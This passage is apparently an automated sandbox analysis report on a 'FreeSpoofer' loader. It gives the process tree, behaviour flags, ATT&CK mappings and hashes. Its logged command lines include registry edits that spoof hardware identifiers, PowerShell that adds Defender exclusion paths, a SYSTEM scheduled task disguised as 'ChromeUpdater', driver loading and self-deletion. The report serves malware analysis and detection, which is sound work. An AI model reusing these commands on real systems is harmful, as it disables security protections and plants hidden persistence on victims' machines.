PID 2840 wrote to memory of 1824 | 2840 | cmd.exe | 47
PID 2840 wrote to memory of 988 | 2840 | cmd.exe | 48
PID 2840 wrote to memory of 988 | 2840 | cmd.exe | 48
PID 2840 wrote to memory of 988 | 2840 | cmd.exe | 48
PID 2840 wrote to memory of 988 | 2840 | cmd.exe | 48
PID 2840 wrote to memory of 1700 | 2840 | cmd.exe | 49
PID 2840 wrote to memory of 1700 | 2840 | cmd.exe | 49
PID 2840 wrote to memory of 1700 | 2840 | cmd.exe | 49
PID 2840 wrote to memory of 1700 | 2840 | cmd.exe | 49
PID 2840 wrote to memory of 328 | 2840 | cmd.exe | 50
PID 2840 wrote to memory of 328 | 2840 | cmd.exe | 50
PID 2840 wrote to memory of 328 | 2840 | cmd.exe | 50
PID 2840 wrote to memory of 328 | 2840 | cmd.exe | 50
PID 2840 wrote to memory of 2860 | 2840 | cmd.exe | 51
PID 2840 wrote to memory of 2860 | 2840 | cmd.exe | 51
PID 2840 wrote to memory of 2860 | 2840 | cmd.exe | 51
PID 2840 wrote to memory of 2860 | 2840 | cmd.exe | 51
PID 2840 wrote to memory of 1708 | 2840 | cmd.exe | 52

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes
C:\Windows\Explorer.EXE (level 1, PID 1228)
  command line: C:\Windows\Explorer.EXE
  C:\Users\Admin\AppData\Local\Temp\FreeSpoofer\Loader.exe (level 2, PID 2288)
    command line: "C:\Users\Admin\AppData\Local\Temp\FreeSpoofer\Loader.exe"
    - Looks for VirtualBox Guest Additions in registry
    - Looks for VMWare Tools registry key
    - Checks BIOS information in registry
    - Loads dropped DLL
    - Maps connected drives based on registry
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    C:\Windows\Cursors\HwTEknTZffvlUbHxuLDNsrZCQIGbvd.exe (level 3, PID 2812)
      command line: "C:\Windows\Cursors\HwTEknTZffvlUbHxuLDNsrZCQIGbvd.exe" C:\Windows\SoftwareDistribution\Download\lmPSqyuhFhCTtppmzwJiYUsDQWRnbg.sys
      - Sets service image path in registry
      - Executes dropped EXE
      - Suspicious behavior: LoadsDriver
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SoftwareDistribution\Download\eBpJzEJRzzexfqXgMaVGflvRQuMBTh.exe (level 3, PID 2600)
      command line: "C:\Windows\SoftwareDistribution\Download\eBpJzEJRzzexfqXgMaVGflvRQuMBTh.exe"
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      C:\Windows\SysWOW64\cmd.exe (level 4, PID 2840)
        command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\smchyip.bat""
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\reg.exe (level 5, PID 2020)
          command line: REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography" /v MachineGuid /t REG_SZ /d f5220d13-4a64-40b0-b684-de582dd0245d /f
          - System Location Discovery: System Language Discovery
        C:\Windows\SysWOW64\reg.exe (level 5, PID 1468)
          command line: REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware Profiles\0001" /v HwProfileGuid /t REG_SZ /d f5220d13-4a64-40b0-b684-de582dd0245d /f
          - System Location Discovery: System Language Discovery
        C:\Windows\SysWOW64\reg.exe (level 5, PID 320)
          command line: REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v BuildGUID /t REG_SZ /d f5220d13-4a64-40b0-b684-de582dd0245d /f
          - System Location Discovery: System Language Discovery
        C:\Windows\SysWOW64\reg.exe (level 5, PID 1724)
          command line: REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e967-e325-11ce-bfc1-08002be10318}\Configuration\Variables\BusDeviceDesc" /v PropertyGuid /t REG_SZ /d f5220d13-4a64-40b0-b684-de582dd0245d /f
          - System Location Discovery: System Language Discovery
        C:\Windows\SysWOW64\reg.exe (level 5, PID 2284)
          command line: REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\Configuration\Variables\DeviceDesc" /v PropertyGuid /t REG_SZ /d f5220d13-4a64-40b0-b684-de582dd0245d /f
          - System Location Discovery: System Language Discovery
        C:\Windows\SysWOW64\reg.exe (level 5, PID 1660)
          command line: REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\Configuration\Variables\Driver" /v PropertyGuid /t REG_SZ /d f5220d13-4a64-40b0-b684-de582dd0245d /f
          - System Location Discovery: System Language Discovery
        C:\Windows\SysWOW64\reg.exe (level 5, PID 1912)
          command line: REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SystemInformation" /v ComputerHardwareId /t REG_SZ /d f5220d13-4a64-40b0-b684-de582dd0245d /f
          - System Location Discovery: System Language Discovery
        C:\Windows\SysWOW64\reg.exe (level 5, PID 1900)
          command line: REG ADD "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v ProductId /t REG_SZ /d f5220d13-4a64-40b0-b684-de582dd0245d /f
          - System Location Discovery: System Language Discovery
        C:\Windows\SysWOW64\reg.exe (level 5, PID 1824)
          command line: REG ADD "HKLM\SYSTEM\HardwareConfig" /v LastConfig /t REG_SZ /d f5220d13-4a64-40b0-b684-de582dd0245d /f
          - System Location Discovery: System Language Discovery
        C:\Windows\SysWOW64\reg.exe (level 5, PID 988)
          command line: REG ADD "HKLM\System\CurrentControlSet\Control\WMI\Security" /v 671a8285-4edb-4cae-99fe-69a15c48c0bc /t REG_SZ /d f5220d13-4a64-40b0-b684-de582dd0245d /f
          - System Location Discovery: System Language Discovery
        C:\Windows\SysWOW64\reg.exe (level 5, PID 1700)
          command line: REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate" /v SusClientId /t REG_SZ /d f5220d13-4a64-40b0-b684-de582dd0245d /f
          - System Location Discovery: System Language Discovery
        C:\Windows\SysWOW64\reg.exe (level 5, PID 328)
          command line: REG ADD "HKLM\SOFTWARE\NVIDIA Corporation\Global\CoProcManager" /v ChipsetMatchID /t REG_SZ /d 4B9DFEFD1407B10C /f
          - System Location Discovery: System Language Discovery
        C:\Windows\SysWOW64\reg.exe (level 5, PID 2860)
          command line: REG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0"
          - System Location Discovery: System Language Discovery
          - Enumerates system info in registry
        C:\Windows\SysWOW64\reg.exe (level 5, PID 1708)
          command line: REG ADD "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0" /v Identifier /t REG_SZ /d 9613114-8d2abece-A /f
          - System Location Discovery: System Language Discovery
          - Enumerates system info in registry
        C:\Windows\SysWOW64\reg.exe (level 5, PID 1896)
          command line: REG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1"
          - System Location Discovery: System Language Discovery
          - Enumerates system info in registry
        C:\Windows\SysWOW64\reg.exe (level 5, PID 1676)
          command line: REG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\2"
          - System Location Discovery: System Language Discovery
          - Enumerates system info in registry
        C:\Windows\SysWOW64\reg.exe (level 5, PID 2900)
          command line: REG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\3"
          - System Location Discovery: System Language Discovery
          - Enumerates system info in registry
        C:\Windows\SysWOW64\reg.exe (level 5, PID 1972)
          command line: REG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\4"
          - System Location Discovery: System Language Discovery
          - Enumerates system info in registry
        C:\Windows\SysWOW64\reg.exe (level 5, PID 1496)
          command line: REG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\5"
          - System Location Discovery: System Language Discovery
          - Enumerates system info in registry
        C:\Windows\SysWOW64\reg.exe (level 5, PID 2044)
          command line: REG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\6"
          - System Location Discovery: System Language Discovery
          - Enumerates system info in registry
        C:\Windows\SysWOW64\reg.exe (level 5, PID 1796)
          command line: REG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\7"
          - System Location Discovery: System Language Discovery
          - Enumerates system info in registry
        C:\Windows\SysWOW64\reg.exe (level 5, PID 2168)
          command line: REG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\8"
          - System Location Discovery: System Language Discovery
          - Enumerates system info in registry
        C:\Windows\SysWOW64\reg.exe (level 5, PID 2648)
          command line: REG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\9"
          - System Location Discovery: System Language Discovery
          - Enumerates system info in registry
        C:\Windows\SysWOW64\cmd.exe (level 5, PID 2232)
          command line: C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi" 2>nul
          - System Location Discovery: System Language Discovery
          C:\Windows\SysWOW64\reg.exe (level 6, PID 2400)
            command line: reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi"
            - System Location Discovery: System Language Discovery
    C:\ProgramData\Microsoft\FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe
      "C:\ProgramData\Microsoft\FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe"
      - Suspicious use of NtCreateUserProcessOtherParentProcess
      - Executes dropped EXE
      - Drops file in Program Files directory
      - Suspicious behavior: EnumeratesProcesses
      PID: 2944
    C:\Users\Admin\AppData\Local\Microsoft\ccOxsQVCyPPfMrkxWfrfMnLsWPgAte.exe
      "C:\Users\Admin\AppData\Local\Microsoft\ccOxsQVCyPPfMrkxWfrfMnLsWPgAte.exe" C:\Users\Admin\AppData\Local\Microsoft\tyiylPcxklhZAVjKpERcvWbMoQWacj.sys
      - Sets service image path in registry
      - Executes dropped EXE
      - Suspicious behavior: LoadsDriver
      - Suspicious use of AdjustPrivilegeToken
      PID: 2360
    C:\Users\Admin\AppData\Local\Microsoft\JTqVhdsyithHueOLWnFrwbBdWWVJVs.exe
      "C:\Users\Admin\AppData\Local\Microsoft\JTqVhdsyithHueOLWnFrwbBdWWVJVs.exe"
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 2752
      C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\dkrhbdc.bat""
        - System Location Discovery: System Language Discovery
        PID: 2780
        C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography" /v MachineGuid /t REG_SZ /d ae44ee00-6c6a-4d27-8fbb-2532fb025a0d /f
          - System Location Discovery: System Language Discovery
          PID: 2720
        C:\Windows\SysWOW64\reg.exe
          REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware Profiles\0001" /v HwProfileGuid /t REG_SZ /d ae44ee00-6c6a-4d27-8fbb-2532fb025a0d /f
          - System Location Discovery: System Language Discovery
          PID: 2644
        C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v BuildGUID /t REG_SZ /d ae44ee00-6c6a-4d27-8fbb-2532fb025a0d /f
          - System Location Discovery: System Language Discovery
          PID: 3008
        C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e967-e325-11ce-bfc1-08002be10318}\Configuration\Variables\BusDeviceDesc" /v PropertyGuid /t REG_SZ /d ae44ee00-6c6a-4d27-8fbb-2532fb025a0d /f
          - System Location Discovery: System Language Discovery
          PID: 2264
        C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\Configuration\Variables\DeviceDesc" /v PropertyGuid /t REG_SZ /d ae44ee00-6c6a-4d27-8fbb-2532fb025a0d /f
          - System Location Discovery: System Language Discovery
          PID: 2216
        C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\Configuration\Variables\Driver" /v PropertyGuid /t REG_SZ /d ae44ee00-6c6a-4d27-8fbb-2532fb025a0d /f
          - System Location Discovery: System Language Discovery
          PID: 2736
        C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SystemInformation" /v ComputerHardwareId /t REG_SZ /d ae44ee00-6c6a-4d27-8fbb-2532fb025a0d /f
          - System Location Discovery: System Language Discovery
          PID: 1572
        C:\Windows\SysWOW64\reg.exe
          REG ADD "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v ProductId /t REG_SZ /d ae44ee00-6c6a-4d27-8fbb-2532fb025a0d /f
          - System Location Discovery: System Language Discovery
          PID: 1612
        C:\Windows\SysWOW64\reg.exe
          REG ADD "HKLM\SYSTEM\HardwareConfig" /v LastConfig /t REG_SZ /d ae44ee00-6c6a-4d27-8fbb-2532fb025a0d /f
          - System Location Discovery: System Language Discovery
          PID: 2868
        C:\Windows\SysWOW64\reg.exe
          REG ADD "HKLM\System\CurrentControlSet\Control\WMI\Security" /v 671a8285-4edb-4cae-99fe-69a15c48c0bc /t REG_SZ /d ae44ee00-6c6a-4d27-8fbb-2532fb025a0d /f
          - System Location Discovery: System Language Discovery
          PID: 2960
        C:\Windows\SysWOW64\reg.exe
          REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate" /v SusClientId /t REG_SZ /d ae44ee00-6c6a-4d27-8fbb-2532fb025a0d /f
          - System Location Discovery: System Language Discovery
          PID: 1668
        C:\Windows\SysWOW64\reg.exe
          REG ADD "HKLM\SOFTWARE\NVIDIA Corporation\Global\CoProcManager" /v ChipsetMatchID /t REG_SZ /d 89C9B7FCA98C0941 /f
          - System Location Discovery: System Language Discovery
          PID: 2552
        C:\Windows\SysWOW64\reg.exe
          REG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0"
          - System Location Discovery: System Language Discovery
          - Enumerates system info in registry
          PID: 2808
        C:\Windows\SysWOW64\reg.exe
          REG ADD "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0" /v Identifier /t REG_SZ /d 4841653-05866bce-A /f
          - System Location Discovery: System Language Discovery
          - Enumerates system info in registry
          PID: 1616
        C:\Windows\SysWOW64\reg.exe
          REG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1"
          - System Location Discovery: System Language Discovery
          - Enumerates system info in registry
          PID: 3012
        C:\Windows\SysWOW64\reg.exe
          REG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\2"
          - System Location Discovery: System Language Discovery
          - Enumerates system info in registry
          PID: 1536
        C:\Windows\SysWOW64\reg.exe
          REG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\3"
          - System Location Discovery: System Language Discovery
          - Enumerates system info in registry
          PID: 1460
        C:\Windows\SysWOW64\reg.exe
          REG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\4"
          - System Location Discovery: System Language Discovery
          - Enumerates system info in registry
          PID: 892
        C:\Windows\SysWOW64\reg.exe
          REG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\5"
          - System Location Discovery: System Language Discovery
          - Enumerates system info in registry
          PID: 2816
        C:\Windows\SysWOW64\reg.exe
          REG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\6"
          - System Location Discovery: System Language Discovery
          - Enumerates system info in registry
          PID: 964
        C:\Windows\SysWOW64\reg.exe
          REG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\7"
          - System Location Discovery: System Language Discovery
          - Enumerates system info in registry
          PID: 1664
        C:\Windows\SysWOW64\reg.exe
          REG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\8"
          - System Location Discovery: System Language Discovery
          - Enumerates system info in registry
          PID: 772
        C:\Windows\SysWOW64\reg.exe
          REG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\9"
          - System Location Discovery: System Language Discovery
          - Enumerates system info in registry
          PID: 1440
        C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi" 2>nul
          - System Location Discovery: System Language Discovery
          PID: 1484
          C:\Windows\SysWOW64\reg.exe
            reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi"
            - System Location Discovery: System Language Discovery
            PID: 2020
    C:\ProgramData\UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe
      "C:\ProgramData\UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe"
      - Suspicious use of NtCreateUserProcessOtherParentProcess
      - Executes dropped EXE
      - Drops file in Program Files directory
      - Suspicious behavior: EnumeratesProcesses
      PID: 988
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 2164
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gdqir#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'ChromeUpdater' /tr '''C:\Program Files\Google\Chrome\ChromeUpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\ChromeUpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ChromeUpdater' -User 'System' -RunLevel 'Highest' -Force; }
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 408
    C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn ChromeUpdater /tr "'C:\Program Files\Google\Chrome\ChromeUpdater.exe'"
      - Scheduled Task/Job: Scheduled Task
      PID: 1608
  C:\Windows\System32\schtasks.exe
    C:\Windows\System32\schtasks.exe /run /tn "ChromeUpdater"
    PID: 1576
  C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\ProgramData\Microsoft\FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe"
    PID: 612
    C:\Windows\System32\choice.exe
      choice /C Y /N /D Y /T 3
      PID: 700
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 768
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gdqir#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'ChromeUpdater' /tr '''C:\Program Files\Google\Chrome\ChromeUpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\ChromeUpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ChromeUpdater' -User 'System' -RunLevel 'Highest' -Force; }
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 352
    C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn ChromeUpdater /tr "'C:\Program Files\Google\Chrome\ChromeUpdater.exe'"
      - Scheduled Task/Job: Scheduled Task
      PID: 2964
  C:\Windows\System32\conhost.exe
    C:\Windows\System32\conhost.exe
    PID: 2204
  C:\Windows\explorer.exe
    C:\Windows\explorer.exe
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 2504
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 1604
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gdqir#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'ChromeUpdater' /tr '''C:\Program Files\Google\Chrome\ChromeUpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\ChromeUpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ChromeUpdater' -User 'System' -RunLevel 'Highest' -Force; }
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 1068
    C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn ChromeUpdater /tr "'C:\Program Files\Google\Chrome\ChromeUpdater.exe'"
      - Scheduled Task/Job: Scheduled Task
      PID: 2224
  C:\Windows\System32\schtasks.exe
    C:\Windows\System32\schtasks.exe /run /tn "ChromeUpdater"
    PID: 2052
  C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\ProgramData\UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe"
    PID: 2376
    C:\Windows\System32\choice.exe
      choice /C Y /N /D Y /T 3
      PID: 2532
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious use of AdjustPrivilegeToken
    PID: 1128
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gdqir#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'ChromeUpdater' /tr '''C:\Program Files\Google\Chrome\ChromeUpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\ChromeUpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ChromeUpdater' -User 'System' -RunLevel 'Highest' -Force; }
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious use of AdjustPrivilegeToken
    PID: 1032
    C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn ChromeUpdater /tr "'C:\Program Files\Google\Chrome\ChromeUpdater.exe'"
      - Scheduled Task/Job: Scheduled Task
      PID: 1808
C:\Windows\system32\taskeng.exe
  taskeng.exe {F1BB6EF0-03E5-4C98-A873-19D458AD76E7} S-1-5-18:NT AUTHORITY\System:Service:
  - Loads dropped DLL
  PID: 2380
  C:\Program Files\Google\Chrome\ChromeUpdater.exe
    "C:\Program Files\Google\Chrome\ChromeUpdater.exe"
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    PID: 2940
  C:\Program Files\Google\Chrome\ChromeUpdater.exe
    "C:\Program Files\Google\Chrome\ChromeUpdater.exe"
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Drops file in Program Files directory
    PID: 2388
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (1): PowerShell (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Persistence
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Downloads
- Filesize: 14KB
  MD5: 0c0195c48b6b8582fa6f6373032118da
  SHA1: d25340ae8e92a6d29f599fef426a2bc1b5217299
  SHA256: 11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5
  SHA512: ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d
- Filesize: 9.8MB
  MD5: f0d66591cc208003b04be406c2ea8420
  SHA1: 06458ca23059df3117666cb4a64dc2e26f9daf97
  SHA256: 927f00ec370ff3aa74cb58bcd118e6198f1945fe7691f8f73f3feaa046dcfb5d
  SHA512: cf67d6eaac9bc848297df4b4f67ff6ef606161b1e9198af6a7f5430a240ca261503c23bb2c15b386a1b421181a399531a3735739a2b860beb18f5e8ea5c01c6a
- Filesize: 3KB
  MD5: 060a9d492eb13b842aad02350b1e7284
  SHA1: 38be5b02a8db6bcc884ab9968cc6e968933cef0c
  SHA256: ef7848cafcc9287ec535cc0f98cd26257f03f4dea69e5f175cba8d7629b2075a
  SHA512: eade10f9e1099b16f7d2361c4a7d7ed23ca211a6b24fb786f9d348416ad5f998e6079ba82966f7e518fe22f80f4443c0026df6bc0812a349ddddc29b97618748
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 15af44c62405d18e9e5c2d9ae8a80e4c
  SHA1: b4644fdc5fce3b008be40361aa52350d04effb87
  SHA256: 2e84d641fdeb1a899de017065f5b9a3422eb4f1767b3a76c302f0197b3995acb
  SHA512: 001c1a94db2268f884317dc5b1dd459886d4da088ec77b7220ee7a6d61c09dffbcb34742d8e39b0f673ad426481fdb78333049f9ca22e3cd1793ee8e2c8b2c4f
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 20c60be47bddc04eb931a20ac002a9e7
  SHA1: 90493b7ab377f41922905e2596da0ee2c0ad9539
  SHA256: 3548396a6adb6249bea50792f481d9043a916e8b6c8e371ddbe7883a0afc9cc9
  SHA512: f1bcc059ce222065c6417f26c280f8bb1b309b0a38610838b4e6ee7ba3155e317836efc1bc452c82e0f3c6cc8f94558904fe935fa6e0f9f6ebeb637336035ffa
- Filesize: 133KB
  MD5: b789be46d520694943db87140ba6edb6
